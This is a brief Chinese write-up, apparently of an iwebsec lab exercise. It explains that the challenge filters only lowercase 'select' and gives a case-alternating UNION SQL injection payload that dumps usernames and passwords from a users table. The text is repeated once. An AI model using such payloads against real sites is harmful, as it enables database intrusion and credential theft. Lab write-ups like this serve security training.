一、解题过程
将SQL关键都换成大小写交替,最后经查看源码,本题只过滤了select
?id=-1 Union Select 1,2,Group_concat(concat(username,0x7e,password)) From iwebsec.users
微信扫一扫
将SQL关键都换成大小写交替,最后经查看源码,本题只过滤了select
?id=-1 Union Select 1,2,Group_concat(concat(username,0x7e,password)) From iwebsec.users
相关推荐